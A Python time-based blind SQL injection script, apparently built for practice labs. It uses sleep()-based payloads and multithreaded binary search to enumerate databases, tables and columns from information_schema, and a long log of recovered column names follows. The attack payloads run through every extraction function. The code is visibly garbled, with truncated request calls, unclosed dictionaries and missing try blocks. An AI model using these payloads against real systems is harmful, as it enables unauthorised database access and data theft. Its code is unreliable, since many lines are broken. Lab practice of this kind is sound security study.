

import requests
import sys
import time
import pdb
import threading
from concurrent.futures import ThreadPoolExecutor

class Injection():
    def __init__(self):
        self.url = ""
        #self.scheLen = []
        self.scheLen = [18, 10, 5, 5, 18, 7, 8]
        #self.scheName = []
        #self.scheName = ['information_schema','challenges','jf123','mysql','performance_schema','pikachu','security']
        #self.scheName = [['information_schema', 40], ['challenges', 1], ['jf123', 1], ['mysql', 24], ['performance_schema', 17], ['pikachu', 5], ['security', 4]]
        #self.scheName = [['information_schema', 40, 14, 10, 37, 7, 17, 7, 6, 5, 13, 16, 16, 10, 10, 7, 11, 9, 23, 8, 8, 17, 14, 17, 10, 6, 11, 17, 16, 8, 15, 5, 18, 10, 24, 17, 13, 10, 12, 19, 16, 22], ['challenges', 1, 10], ['jf123', 1, 10], ['mysql', 24, 12, 2, 5, 4, 11, 13, 12, 13, 10, 4, 16, 6, 4, 10, 12, 7, 8, 11, 9, 21, 14, 20, 25, 4], ['performance_schema', 17, 14, 20, 20, 25, 32, 40, 40, 14, 26, 24, 15, 18, 16, 15, 17, 12, 7], ['pikachu', 5, 8, 6, 7, 5, 8], ['security', 4, 6, 8, 7, 5]]
        self.scheName = [['information_schema', 40, 'CHARACTER_SETS', 'COLLATIONS', 'COLLATION_CHARACTER_SET_APPLICABILITY', 'COLUMNS', 'COLUMN_PRIVILEGES', 'ENGINES', 'EVENTS', 'FILES', 'GLOBAL_STATUS', 'GLOBAL_VARIABLES', 'KEY_COLUMN_USAGE', 'PARAMETERS', 'PARTITIONS', 'PLUGINS', 'PROCESSLIST', 'PROFILING', 'REFERENTIAL_CONSTRAINTS', 'ROUTINES', 'SCHEMATA', 'SCHEMA_PRIVILEGES', 'SESSION_STATUS', 'SESSION_VARIABLES', 'STATISTICS', 'TABLES', 'TABLESPACES', 'TABLE_CONSTRAINTS', 'TABLE_PRIVILEGES', 'TRIGGERS', 'USER_PRIVILEGES', 'VIEWS', 'INNODB_BUFFER_PAGE', 'INNODB_TRX', 'INNODB_BUFFER_POOL_STATS', 'INNODB_LOCK_WAITS', 'INNODB_CMPMEM', 'INNODB_CMP', 'INNODB_LOCKS', 'INNODB_CMPMEM_RESET', 'INNODB_CMP_RESET', 'INNODB_BUFFER_PAGE_LRU'], ['challenges', 1, 'kefgu88kuc'], ['jf123', 1, 'jf_content'], ['mysql', 24, 'columns_priv', 'db', 'event', 'func', 'general_log', 'help_category', 'help_keyword', 'help_relation', 'help_topic', 'host', 'ndb_binlog_index', 'plugin', 'proc', 'procs_priv', 'proxies_priv', 'servers', 'slow_log', 'tables_priv', 'time_zone', 'time_zone_leap_second', 'time_zone_name', 'time_zone_transition', 'time_zone_transition_type', 'user'], ['performance_schema', 17, 'cond_instances', 'events_waits_current', 'events_waits_history', 'events_waits_history_long', 'events_waits_summary_by_instance', 'events_waits_summary_by_thread_by_event_', 'events_waits_summary_global_by_event_nam', 'file_instances', 'file_summary_by_event_name', 'file_summary_by_instance', 'mutex_instances', 'performance_timers', 'rwlock_instances', 'setup_consumers', 'setup_instruments', 'setup_timers', 'threads'], ['pikachu', 5, 'httpinfo', 'member', 'message', 'users', 'xssblind'], ['security', 4, 'emails', 'referers', 'uagents', 'users']] 
        self.headers = {"Content-Type":"application/x-www-form-urlencoded"}
        self.information_schema_GLOBAL_VARIABLES =  [2, 13, 14]
        self.information_schema_GLOBAL_STATUS =  [2, 13, 14]
        self.information_schema_SESSION_VARIABLES =  [2, 13, 14]
        self.information_schema_SESSION_STATUS =  [2, 13, 14]
        self.information_schema_COLLATION_CHARACTER_SET_APPLICABILITY =  [2, 14, 18]
        self.information_schema_PROCESSLIST =  [8, 2, 4, 4, 2, 7, 4, 5, 4]
        self.information_schema_USER_PRIVILEGES =  [4, 7, 13, 14, 12]
        self.information_schema_SCHEMATA =  [5, 12, 11, 26, 22, 8]
        self.information_schema_CHARACTER_SETS =  [4, 18, 20, 11, 6]
        self.information_schema_SCHEMA_PRIVILEGES =  [5, 7, 13, 12, 14, 12]
        self.information_schema_ENGINES =  [6, 6, 7, 7, 12, 2, 10]
        self.information_schema_COLLATIONS =  [6, 14, 18, 2, 10, 11, 7]
        self.challenges_kefgu88kuc =  [4, 2, 6, 11, 4]
        self.information_schema_TABLE_PRIVILEGES =  [6, 7, 13, 12, 10, 14, 12]
        self.information_schema_COLUMN_PRIVILEGES =  [7, 7, 13, 12, 10, 11, 14, 12]
        self.information_schema_INNODB_LOCK_WAITS =  [4, 17, 17, 15, 16]
        self.mysql_func =  [4, 4, 3, 2, 4]
        self.information_schema_TABLE_CONSTRAINTS =  [6, 18, 17, 15, 12, 10, 15]
        self.information_schema_INNODB_CMP =  [6, 9, 12, 15, 13, 14, 15]
        self.information_schema_TABLESPACES =  [9, 15, 6, 15, 18, 11, 15, 12, 12, 18]
        self.mysql_columns_priv =  [7, 4, 2, 4, 10, 11, 9, 11]
        self.mysql_help_keyword =  [2, 15, 4]
        self.information_schema_PLUGINS =  [11, 11, 14, 13, 11, 19, 14, 22, 13, 18, 14, 11]
        self.mysql_plugin =  [2, 4, 2]
        self.mysql_help_category =  [4, 16, 4, 18, 3]
        self.information_schema_INNODB_CMP_RESET =  [6, 9, 12, 15, 13, 14, 15]
        self.information_schema_INNODB_CMPMEM =  [6, 9, 20, 10, 10, 14, 15]
        self.information_schema_REFERENTIAL_CONSTRAINTS =  [11, 18, 17, 15, 25, 24, 22, 12, 11, 11, 10, 21]
        self.mysql_help_relation =  [2, 13, 15]
        self.information_schema_VIEWS =  [10, 13, 12, 10, 15, 12, 12, 7, 13, 20, 20]
        self.information_schema_KEY_COLUMN_USAGE =  [12, 18, 17, 15, 13, 12, 10, 11, 16, 29, 23, 21, 22]
        self.information_schema_INNODB_CMPMEM_RESET =  [6, 9, 20, 10, 10, 14, 15]
        self.mysql_help_topic =  [6, 13, 4, 16, 11, 7, 3]
        self.mysql_time_zone =  [2, 12, 16]
        self.mysql_general_log =  [6, 10, 9, 9, 9, 12, 8]
        self.mysql_time_zone_name =  [2, 4, 12]
        self.performance_schema_cond_instances =  [2, 4, 21]
        self.information_schema_INNODB_LOCKS =  [10, 7, 11, 9, 9, 10, 10, 10, 9, 8, 9]
        self.jf123_jf_content =  [13, 5, 7, 8, 6, 9, 11, 7, 7, 5, 7, 5, 9, 7]
        self.mysql_time_zone_leap_second =  [2, 15, 10]
        self.information_schema_STATISTICS =  [16, 13, 12, 10, 10, 12, 10, 12, 11, 9, 11, 8, 6, 8, 10, 7, 13]
        self.performance_schema_events_waits_summary_by_thread_by_event_ =  [1, 2]
        self.performance_schema_events_waits_summary_global_by_event_nam =  [1, 2]
        self.mysql_ndb_binlog_index =  [7, 8, 4, 5, 7, 7, 7, 9]
        self.information_schema_PARAMETERS =  [15, 16, 15, 13, 16, 14, 14, 9, 24, 22, 17, 13, 18, 14, 14, 12]
        self.mysql_servers =  [9, 11, 4, 2, 8, 8, 4, 6, 7, 5]
        self.mysql_procs_priv =  [8, 4, 2, 4, 12, 12, 7, 9, 9]
        self.mysql_time_zone_transition =  [3, 12, 15, 18]
        self.mysql_proxies_priv =  [7, 4, 4, 12, 12, 10, 7, 9]
        self.mysql_time_zone_transition_type =  [5, 12, 18, 6, 6, 12]
        self.performance_schema_setup_consumers =  [2, 4, 7]
        self.mysql_tables_priv =  [8, 4, 2, 4, 10, 7, 9, 10, 11]
        self.performance_schema_mutex_instances =  [3, 4, 21, 19]
        self.information_schema_COLUMNS =  [19, 13, 12, 10, 11, 16, 14, 11, 9, 24, 22, 17, 13, 18, 14, 11, 10, 5, 10, 14]
        self.performance_schema_setup_instruments =  [3, 4, 7, 5]
        self.performance_schema_file_instances =  [3, 9, 10, 10]
        self.performance_schema_setup_timers =  [2, 4, 10]
        self.pikachu_message =  [3, 2, 7, 4]
        self.performance_schema_threads =  [3, 9, 14, 4]
        self.performance_schema_rwlock_instances =  [4, 4, 21, 25, 20]
        self.security_emails =  [2, 2, 8]
        self.performance_schema_performance_timers =  [4, 10, 15, 16, 14]
        self.pikachu_xssblind =  [4, 2, 4, 7, 4]
        self.performance_schema_file_summary_by_event_name =  [5, 10, 10, 11, 24, 25]
        self.pikachu_users =  [4, 2, 8, 8, 5]
        self.information_schema_TABLES =  [21, 13, 12, 10, 10, 6, 7, 10, 10, 14, 11, 15, 12, 9, 14, 11, 11, 10, 15, 8, 14, 13]
        self.information_schema_INNODB_BUFFER_PAGE =  [20, 7, 8, 5, 11, 9, 10, 9, 9, 19, 19, 11, 10, 10, 14, 9, 15, 10, 6, 6, 15]
        self.pikachu_member =  [7, 2, 8, 2, 3, 8, 7, 5]
        self.security_users =  [3, 2, 8, 8]
        self.mysql_slow_log =  [11, 10, 9, 10, 9, 9, 13, 2, 14, 9, 9, 8]
        self.performance_schema_events_waits_summary_by_instance =  [7, 10, 21, 10, 14, 14, 14, 14]
        self.performance_schema_file_summary_by_instance =  [6, 9, 10, 10, 11, 24, 25]
        self.security_referers =  [3, 2, 7, 10]
        self.security_uagents =  [4, 2, 6, 10, 8]
        self.pikachu_httpinfo =  [6, 2, 6, 9, 9, 10, 10]
        self.mysql_db =  [22, 4, 2, 4, 11, 11, 11, 11, 11, 9, 10, 15, 10, 10, 21, 16, 16, 14, 19, 18, 12, 10, 12]
        self.information_schema_TRIGGERS =  [22, 15, 14, 12, 18, 20, 19, 18, 12, 16, 16, 18, 13, 26, 26, 24, 24, 7, 8, 7, 20, 20, 18]
        self.information_schema_EVENTS =  [24, 13, 12, 10, 7, 9, 10, 16, 10, 10, 14, 14, 8, 6, 4, 6, 13, 7, 12, 13, 13, 10, 20, 20, 18]
        self.information_schema_INNODB_TRX =  [22, 6, 9, 11, 21, 16, 10, 19, 9, 19, 17, 17, 16, 21, 15, 17, 23, 19, 17, 22, 26, 25, 25]
        self.mysql_event =  [22, 2, 4, 4, 7, 10, 14, 14, 7, 8, 13, 6, 4, 6, 13, 8, 7, 10, 9, 20, 20, 12, 9]
        self.information_schema_INNODB_BUFFER_PAGE_LRU =  [20, 7, 12, 5, 11, 9, 10, 9, 9, 19, 19, 11, 10, 10, 14, 9, 15, 10, 6, 6, 15]
        self.mysql_host =  [20, 4, 2, 11, 11, 11, 11, 11, 9, 10, 15, 10, 10, 21, 16, 16, 14, 19, 18, 12, 12]
        self.information_schema_PARTITIONS =  [25, 13, 12, 10, 14, 17, 26, 29, 16, 19, 20, 23, 21, 10, 14, 11, 15, 12, 9, 11, 11, 10, 8, 17, 9, 15]
        self.mysql_proc =  [20, 2, 4, 4, 13, 8, 15, 16, 13, 10, 7, 4, 7, 7, 8, 8, 7, 20, 20, 12, 9]
        self.performance_schema_events_waits_current =  [16, 9, 8, 10, 6, 11, 9, 10, 5, 13, 11, 11, 21, 16, 9, 15, 5]
        self.performance_schema_events_waits_history =  [16, 9, 8, 10, 6, 11, 9, 10, 5, 13, 11, 11, 21, 16, 9, 15, 5]
        self.performance_schema_events_waits_history_long =  [16, 9, 8, 10, 6, 11, 9, 10, 5, 13, 11, 11, 21, 16, 9, 15, 5]
        self.information_schema_ROUTINES =  [30, 13, 15, 14, 12, 12, 9, 24, 22, 17, 13, 18, 14, 14, 12, 18, 13, 17, 15, 16, 15, 8, 13, 7, 12, 8, 15, 7, 20, 20, 18]
        self.information_schema_FILES =  [38, 7, 9, 9, 15, 13, 12, 10, 18, 20, 6, 13, 12, 12, 12, 13, 11, 12, 12, 15, 13, 16, 16, 12, 19, 7, 10, 10, 14, 11, 15, 12, 9, 11, 11, 10, 8, 6, 5]
        self.information_schema_INNODB_BUFFER_POOL_STATS =  [32, 7, 9, 12, 14, 18, 23, 18, 13, 17, 18, 16, 20, 21, 25, 17, 20, 20, 15, 17, 18, 16, 8, 28, 32, 23, 25, 15, 23, 12, 14, 16, 18]
        self.mysql_user =  [42, 4, 4, 8, 11, 11, 11, 11, 11, 9, 11, 13, 12, 9, 10, 15, 10, 10, 12, 10, 21, 16, 12, 15, 16, 16, 14, 19, 18, 16, 10, 12, 22, 8, 10, 11, 12, 13, 11, 15, 20, 6, 21]
    def schemaNum(self):
        high = 30
        low = 1
        mid = (low + high) // 2
        while high > low:
            payload = f"1' or if((select count(schema_name) from information_schema.schemata)>{mid},sleep(5),0)-- +"       #查库名
            #payload = f"1'or if(ascii(substr((seleCt(group_concat(table_name))from(information_schema.tables)where(table_schema)='note'),{i},1))>{mid},sleep(2),1)#"        #查表名
            #payload = f"1'or if(ascii(substr((seleCt(group_concat(column_name))from(information_schema.columns)where(table_name)='users'),{i},1))>{mid},sleep(2),1)#"        #查列名
            #payload = f"1'or if(ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid},sleep(2),1)#"       #查数据
            data = {
            last = int(time.time())
                res =, data = data)
            except Exception as e:
                now = int(time.time())
            if now - last >5 :    
                low = mid
            else :
                high = mid
            mid = (low + high) // 2
            if mid==low and high-low==1:
                #print("The Number of schema is {}".format(high))
    def usage(self):
        if len(sys.argv)!=2:
            print('The number of parameter number not right')
            print('Usage:python3 %s url '% sys.argv[0])
            print("Example:python3 username=admin&password=admin password")
        self.url = sys.argv[1] 
    def schemataLength(self):
        for i in range(self.scheNum):
            high = 30
            low = 1
            mid = (low + high) // 2
            while high > low:
                #print(high,low,mid,end=" ")
                payload = f"1' or if((select length(schema_name) from information_schema.schemata limit {i},1)>{mid},sleep(1),0)#"       #查库名
                data = {
                last = int(time.time())
                    res =,headers=self.headers,data = data)
                except Exception as e:
                    now = int(time.time())
                if now - last >5 :    
                    low = mid
                else :
                    high = mid
                mid = (low + high) // 2 
                if mid==low and high-low==1:
            if flag==1:
    def schemaName(self,theNumDBName,l): # n[1] is the number of databases ;n[2] is the database name length
        for i in range(1,l+1):
            high = 127
            low = 32
            mid = (low + high) // 2 
            while high > low:
                payload = f"1' or if(ascii(substr((select schema_name from information_schema.schemata limit {theNumDBName},1),{i},1))>{mid},sleep(0.5),0);-- +"       #查库名
                data = {
                last = int(time.time())
                    res =, data = data)
                except Exception as e:
                    now = int(time.time())
                if now - last >5 :    
                    low = mid
                else :
                    high = mid
                mid = (low + high) // 2
                if mid==low and high-low==1:
                    name += chr(int(high))
            if flag==1:
            name += chr(int(low))
    def schethreadMan(self):    #managent the multithread
        for i in range(0,len(self.scheLen)):
        for i in t:
        for i in t:
    def tablesNum(self,n,scheName): #n :the number of databases ;scheName: the name of the number database 
        high = 40
        low = 0
        mid = (low + high) // 2
        while high > low:
            # guess the tables number of database
            payload = f"1'or if((select count(table_name) from information_schema.tables where table_schema= \'{scheName}\')>{mid},sleep(0.5),0)-- +" 
            data = {
            last = int(time.time())
                res =, data = data)
            except Exception as e:
                now = int(time.time())
            if now - last >5 :    
                low = mid
            else :
                high = mid
            mid = (low + high) // 2
            if mid==low and high-low==1:
                #print("The Number of schema is {}".format(high))
                print(f"the {scheName} database has {high} tables")
                self.scheName[n] = [scheName,high]
        print(f"the {scheName} database has {mid} tables")
        self.scheName[n] = [scheName,mid]
    def tablesThreadMan(self):
        for i in range(0,len(self.scheName)):
        for i in t:
        for i in t:
    def tableNameLength(self,n,scheName,l): #guess the table name length
        for i in range(l):
            high = 50
            low = 1
            mid = (low + high) // 2
            while high > low:
                #print(high,low,mid,end=" ")
                payload = f"1' or if((select length(table_name) from information_schema.tables where table_schema='{scheName}' limit {i},1)>{mid},sleep(0.5),0)-- +" 
                data = {
                last = int(time.time())
                    res =,headers=self.headers,data = data)
                except Exception as e:
                    now = int(time.time())
                if now - last >5 :    
                    low = mid
                else :
                    high = mid
                mid = (low + high) // 2 
                if mid==low and high-low==1:
                    print(f"the {scheName} database the {i+1} table name length:{high}")
            if flag==1:
            print(f"the {scheName} database the {i+1} table name length:{mid}")
    def tableNameLengthThreadMan(self):
        for i in range(0,len(self.scheName)):
        for i in t:
        for i in t:
    def tableName(self,n1,scheName,l,n2): # n1:the number of database; scheName :schema name ;l :the table length ;n2: the number of table
        for i in range(1,l+1):
            high = 127
            low = 32
            mid = (low + high) // 2 
            while high > low:
                #guess the table name
                payload = f"1' or if(ascii(substr((select table_name from information_schema.tables where table_schema = \'{scheName}\' limit {n2-2},1),{i},1))>{mid},sleep(0.5),1);-- +"
                data = {
                last = int(time.time())
                    res =, data = data)
                except Exception as e:
                    now = int(time.time())
                if now - last > 5 :    
                    low = mid
                else :
                    high = mid
                mid = (low + high) // 2
                if mid == low and high - low == 1:
                    name += chr(int(high))
                    flag = 1
            if flag==1:
            name += chr(int(low))
        self.scheName[n1][n2] = name
        print(f"the {scheName} database {n2-1} table name is:{name}")
    def tableNameThreadMan(self):
        thread_pool = ThreadPoolExecutor(max_workers = 30) # max_workers指定了复用线程的最大数量     
        for i in range(len(self.scheName)):
            for j in  range(2,len(self.scheName[i])):
                future = thread_pool.submit(self.tableName,i,self.scheName[i][0],self.scheName[i][j],j)
        #future = thread_pool.submit(self.tableName,0,self.scheName[0][0],self.scheName[0][2],2)
    def columnsNum(self,scheName,tableName): #scheName: the name of the number database ;tableName:the table name
        high = 50
        low = 0
        if not hasattr(inject,str(scheName)+"_"+str(tableName)):
        mid = (low + high) // 2
        while high > low:
            # guess the columns number of table
            payload = f"1' or if((select count(column_name) from information_schema.columns where table_schema = \'{scheName}\' and table_name = \'{tableName}\') >{mid},sleep(0.5),0) -- +" 
            data = {
            last = int(time.time())
                res =, data = data)
            except Exception as e:
                now = int(time.time())
            if now - last >5 :    
                low = mid
            else :
                high = mid
            mid = (low + high) // 2
            if mid==low and high-low==1:
                #print("The Number of schema is {}".format(high))
                #print(f"the {scheName} database {tableName} tables has {high} columns")
                temp = getattr(inject,str(scheName)+"_"+str(tableName))
                print(f"self.{scheName}_{tableName} = ",getattr(inject,str(scheName)+"_"+str(tableName)))
        #print(f"the {scheName} database {tableName} tables has {high} columns")
        temp = getattr(inject,str(scheName)+"_"+str(tableName))
        print(f"self.{scheName}_{tableName} = ",getattr(inject,str(scheName)+"_"+str(tableName)))
    def columnsNumThreadMan(self):
        thread_pool = ThreadPoolExecutor(max_workers = 30) # max_workers指定了复用线程的最大数量     
        for i in range(len(self.scheName)):
            for j in  range(2,len(self.scheName[i])):
                future = thread_pool.submit(self.columnsNum,self.scheName[i][0],self.scheName[i][j])
    def columnsNameLength(self,scheName,tableName): #guess the column name length
        columnsNum = getattr(inject,str(scheName)+"_"+str(tableName))[0]
        for i in range(columnsNum):
            high = 40
            low = 1
            mid = (low + high) // 2
            while high > low:
                #print(high,low,mid,end=" ")
                payload = f"1' or if((select length(column_name) from information_schema.columns where table_schema=\'{scheName}\' and table_name = \'{tableName}\' limit {i},1)>{mid},sleep(0.5),0)-- +" 
                data = {
                last = int(time.time())
                    res =,headers=self.headers,data = data)
                except Exception as e:
                    now = int(time.time())
                if now - last >5 :    
                    low = mid
                else :
                    high = mid
                mid = (low + high) // 2 
                if mid==low and high-low==1:
                    #print("The Number of schema is {}".format(high))
                    #print(f"the {scheName} database {tableName} tables the {i+1} column {high} has {high} character")
                    temp = getattr(inject,str(scheName)+"_"+str(tableName))   #读取类属性值
                    temp.append(high)       #将字段名长度添加到类属性
                    setattr(inject,str(scheName)+"_"+str(tableName),temp)  #临时值重置到类属性值
                    #print(f"self.{scheName}_{tableName} = ",getattr(inject,str(scheName)+"_"+str(tableName)))
            if flag == 1:
            #print(f"the {scheName} database {tableName} tables has {high} columns")
            temp = getattr(inject,str(scheName)+"_"+str(tableName))   #读取类属性值
            temp.append(high)       #将字段名长度添加到类属性
            setattr(inject,str(scheName)+"_"+str(tableName),temp)  #临时值重置到类属性值
            #print(f"self.{scheName}_{tableName} = ",getattr(inject,str(scheName)+"_"+str(tableName)))
        print(f"self.{scheName}_{tableName} = ",getattr(inject,str(scheName)+"_"+str(tableName)))
    def columnsLengthThreadMan(self):
        thread_pool = ThreadPoolExecutor(max_workers = 30) # max_workers指定了复用线程的最大数量     
        for i in range(len(self.scheName)):
            for j in  range(2,len(self.scheName[i])):
               future = thread_pool.submit(self.columnsNameLength,self.scheName[i][0],self.scheName[i][j])
        #future = thread_pool.submit(self.columnsNameLength,self.scheName[0][0],self.scheName[0][2])
    def columnName(self,scheName,tableName,n1): # scheName :schema name ;tableName :the table  Name ; n1 the column name length  index in class list 
        columnLen = getattr(inject,str(scheName)+"_"+str(tableName))[n1]
        for i in range(1,columnLen+1):
            high = 127
            low = 32
            mid = (low + high) // 2 
            while high > low:
                #guess the table name
                payload = f"1' or if((ascii(substr((select column_name from information_schema.columns where table_schema = \'{scheName}\' and table_name = \'{tableName}\' limit {n1-1},1),{i},1)))>{mid},sleep(0.5),1) -- +"
                data = {
                last = int(time.time())
                    res =, data = data)
                except Exception as e:
                    now = int(time.time())
                if now - last > 5 :    
                    low = mid
                else :
                    high = mid
                mid = (low + high) // 2
                if mid == low and high - low == 1:
                    name += chr(int(high))
                    flag = 1
            if flag==1:
            name += chr(int(low))
        temp[n1] = name
        print(f"the {scheName} database {tableName} table the {n1} column name  is:{name}")
    def  columnNameThreadMan(self):
        thread_pool = ThreadPoolExecutor(max_workers = 30) # max_workers指定了复用线程的最大数量     
        for i in range(len(self.scheName)):
            for j in  range(2,len(self.scheName[i])):
                    for k in range(1,len(getattr(inject,str(self.scheName[i][0])+"_"+str(self.scheName[i][j])))):
                        future = thread_pool.submit(self.columnName,self.scheName[i][0],self.scheName[i][j],k) 
                except Exception as e:
        #future = thread_pool.submit(self.columnName,self.scheName[0][0],self.scheName[0][2],1)
if __name__ == '__main__':
    #    pdb.set_trace()
    inject = Injection()



the information_schema database COLLATIONS table the 3 column name  is:ID
the information_schema database COLUMNS table the 17 column name  is:EXTRA
the information_schema database CHARACTER_SETS table the 4 column name  is:MAXLEN
the information_schema database COLUMNS table the 8 column name  is:DATA_TYPE
the information_schema database COLLATIONS table the 6 column name  is:SORTLEN
the information_schema database COLUMNS table the 18 column name  is:PRIVILEGES
the information_schema database COLLATIONS table the 4 column name  is:IS_DEFAULT
the information_schema database COLUMNS table the 3 column name  is:TABLE_NAME
the information_schema database COLUMN_PRIVILEGES table the 1 column name  is:GRANTEE
the information_schema database CHARACTER_SETS table the 3 column name  is:DESCRIPTION
the information_schema database COLLATIONS table the 5 column name  is:IS_COMPILED
the information_schema database COLUMNS table the 16 column name  is:COLUMN_KEY
the information_schema database COLUMNS table the 2 column name  is:TABLE_SCHEMA
the information_schema database COLUMNS table the 15 column name  is:COLUMN_TYPE
the information_schema database COLUMNS table the 7 column name  is:IS_NULLABLE
the information_schema database COLUMNS table the 4 column name  is:COLUMN_NAME
the information_schema database COLUMNS table the 1 column name  is:TABLE_CATALOG
the information_schema database ENGINES table the 5 column name  is:XA
the information_schema database COLUMNS table the 12 column name  is:NUMERIC_SCALE
the information_schema database COLUMNS table the 6 column name  is:COLUMN_DEFAULT
the information_schema database ENGINES table the 2 column name  is:SUPPORT
the information_schema database COLUMNS table the 13 column name  is:CHARACTER_SET_NAME
the information_schema database COLLATION_CHARACTER_SET_APPLICABILITY table the 2 column name  is:CHARACTER_SET_NAME
the information_schema database COLUMNS table the 14 column name  is:COLLATION_NAME
the information_schema database COLLATIONS table the 1 column name  is:COLLATION_NAME
the information_schema database COLLATION_CHARACTER_SET_APPLICABILITY table the 1 column name  is:COLLATION_NAME
the information_schema database CHARACTER_SETS table the 1 column name  is:CHARACTER_SET_NAME
the information_schema database COLLATIONS table the 2 column name  is:CHARACTER_SET_NAME
the information_schema database ENGINES table the 1 column name  is:ENGINE
the information_schema database COLUMN_PRIVILEGES table the 4 column name  is:TABLE_NAME
the information_schema database COLUMNS table the 5 column name  is:ORDINAL_POSITION
the information_schema database COLUMN_PRIVILEGES table the 3 column name  is:TABLE_SCHEMA
the information_schema database COLUMNS table the 11 column name  is:NUMERIC_PRECISION
the information_schema database COLUMNS table the 19 column name  is:COLUMN_COMMENT
the information_schema database ENGINES table the 3 column name  is:COMMENT
the information_schema database COLUMN_PRIVILEGES table the 2 column name  is:TABLE_CATALOG
the information_schema database EVENTS table the 14 column name  is:ENDS
the information_schema database EVENTS table the 4 column name  is:DEFINER
the information_schema database ENGINES table the 6 column name  is:SAVEPOINTS
the information_schema database CHARACTER_SETS table the 2 column name  is:DEFAULT_COLLATE_NAME
the information_schema database COLUMN_PRIVILEGES table the 6 column name  is:PRIVILEGE_TYPE
the information_schema database EVENTS table the 13 column name  is:STARTS
the information_schema database COLUMN_PRIVILEGES table the 7 column name  is:IS_GRANTABLE
the information_schema database COLUMN_PRIVILEGES table the 5 column name  is:COLUMN_NAME
the information_schema database EVENTS table the 15 column name  is:STATUS
the information_schema database COLUMNS table the 10 column name  is:CHARACTER_OCTET_LENGTH
the information_schema database EVENTS table the 3 column name  is:EVENT_NAME
the information_schema database EVENTS table the 5 column name  is:TIME_ZONE
the information_schema database ENGINES table the 4 column name  is:TRANSACTIONS
the information_schema database EVENTS table the 17 column name  is:CREATED
the information_schema database EVENTS table the 2 column name  is:EVENT_SCHEMA
the information_schema database EVENTS table the 12 column name  is:SQL_MODE
the information_schema database COLUMNS table the 9 column name  is:CHARACTER_MAXIMUM_LENGTH
the information_schema database EVENTS table the 6 column name  is:EVENT_BODY
the information_schema database EVENTS table the 8 column name  is:EVENT_TYPE
the information_schema database EVENTS table the 1 column name  is:EVENT_CATALOG
the information_schema database EVENTS table the 9 column name  is:EXECUTE_AT
the information_schema database FILES table the 1 column name  is:FILE_ID
the information_schema database FILES table the 3 column name  is:FILE_TYPE
the information_schema database EVENTS table the 19 column name  is:LAST_EXECUTED
the information_schema database FILES table the 10 column name  is:ENGINE
the information_schema database EVENTS table the 21 column name  is:ORIGINATOR
the information_schema database EVENTS table the 20 column name  is:EVENT_COMMENT
the information_schema database FILES table the 6 column name  is:TABLE_SCHEMA
the information_schema database FILES table the 12 column name  is:DELETED_ROWS
the information_schema database FILES table the 14 column name  is:FREE_EXTENTS
the information_schema database FILES table the 16 column name  is:EXTENT_SIZE
the information_schema database FILES table the 11 column name  is:FULLTEXT_KEYS
the information_schema database FILES table the 18 column name  is:MAXIMUM_SIZE
the information_schema database EVENTS table the 24 column name  is:DATABASE_COLLATION
the information_schema database FILES table the 8 column name  is:LOGFILE_GROUP_NAME
the information_schema database EVENTS table the 23 column name  is:COLLATION_CONNECTION
the information_schema database FILES table the 2 column name  is:FILE_NAME
the information_schema database EVENTS table the 11 column name  is:INTERVAL_FIELD
the information_schema database EVENTS table the 16 column name  is:ON_COMPLETION
the information_schema database FILES table the 5 column name  is:TABLE_CATALOG
the information_schema database FILES table the 13 column name  is:UPDATE_COUNT
the information_schema database FILES table the 17 column name  is:INITIAL_SIZE
the information_schema database FILES table the 9 column name  is:LOGFILE_GROUP_NUMBER
the information_schema database EVENTS table the 10 column name  is:INTERVAL_VALUE
the information_schema database EVENTS table the 7 column name  is:EVENT_DEFINITION
the information_schema database FILES table the 15 column name  is:TOTAL_EXTENTS
the information_schema database EVENTS table the 18 column name  is:LAST_ALTERED
the information_schema database FILES table the 4 column name  is:TABLESPACE_NAME
the information_schema database FILES table the 7 column name  is:TABLE_NAME
the information_schema database EVENTS table the 22 column name  is:CHARACTER_SET_CLIENT
the information_schema database FILES table the 38 column name  is:EXTRA
the information_schema database FILES table the 37 column name  is:STATUS
the information_schema database FILES table the 25 column name  is:VERSION
the information_schema database FILES table the 32 column name  is:DATA_FREE
the information_schema database FILES table the 36 column name  is:CHECKSUM
the information_schema database FILES table the 34 column name  is:UPDATE_TIME
the information_schema database FILES table the 27 column name  is:TABLE_ROWS
the information_schema database KEY_COLUMN_USAGE table the 6 column name  is:TABLE_NAME
the information_schema database FILES table the 29 column name  is:DATA_LENGTH
the information_schema database FILES table the 26 column name  is:ROW_FORMAT
the information_schema database FILES table the 33 column name  is:CREATE_TIME
the information_schema database FILES table the 35 column name  is:CHECK_TIME
the information_schema database KEY_COLUMN_USAGE table the 5 column name  is:TABLE_SCHEMA
the information_schema database FILES table the 23 column name  is:RECOVER_TIME
the information_schema database FILES table the 31 column name  is:INDEX_LENGTH
the information_schema database GLOBAL_STATUS table the 1 column name  is:VARIABLE_NAME
the information_schema database GLOBAL_VARIABLES table the 1 column name  is:VARIABLE_NAME
the information_schema database GLOBAL_STATUS table the 2 column name  is:VARIABLE_VALUE
the information_schema database GLOBAL_VARIABLES table the 2 column name  is:VARIABLE_VALUE
the information_schema database FILES table the 28 column name  is:AVG_ROW_LENGTH
the information_schema database KEY_COLUMN_USAGE table the 4 column name  is:TABLE_CATALOG
the information_schema database FILES table the 21 column name  is:LAST_UPDATE_TIME
the information_schema database FILES table the 20 column name  is:CREATION_TIME
the information_schema database FILES table the 30 column name  is:MAX_DATA_LENGTH
the information_schema database FILES table the 19 column name  is:AUTOEXTEND_SIZE
the information_schema database FILES table the 22 column name  is:LAST_ACCESS_TIME
the information_schema database KEY_COLUMN_USAGE table the 3 column name  is:CONSTRAINT_NAME
the information_schema database KEY_COLUMN_USAGE table the 7 column name  is:COLUMN_NAME
the information_schema database KEY_COLUMN_USAGE table the 2 column name  is:CONSTRAINT_SCHEMA
the information_schema database PARAMETERS table the 7 column name  is:DATA_TYPE
the information_schema database KEY_COLUMN_USAGE table the 1 column name  is:CONSTRAINT_CATALOG
the information_schema database FILES table the 24 column name  is:TRANSACTION_COUNTER
the information_schema database KEY_COLUMN_USAGE table the 8 column name  is:ORDINAL_POSITION
the information_schema database PARAMETERS table the 5 column name  is:PARAMETER_MODE
the information_schema database PARAMETERS table the 6 column name  is:PARAMETER_NAME
the information_schema database PARAMETERS table the 3 column name  is:SPECIFIC_NAME
the information_schema database PARTITIONS table the 3 column name  is:TABLE_NAME
the information_schema database PARAMETERS table the 2 column name  is:SPECIFIC_SCHEMA
the information_schema database PARAMETERS table the 15 column name  is:ROUTINE_TYPE
the information_schema database PARTITIONS table the 2 column name  is:TABLE_SCHEMA
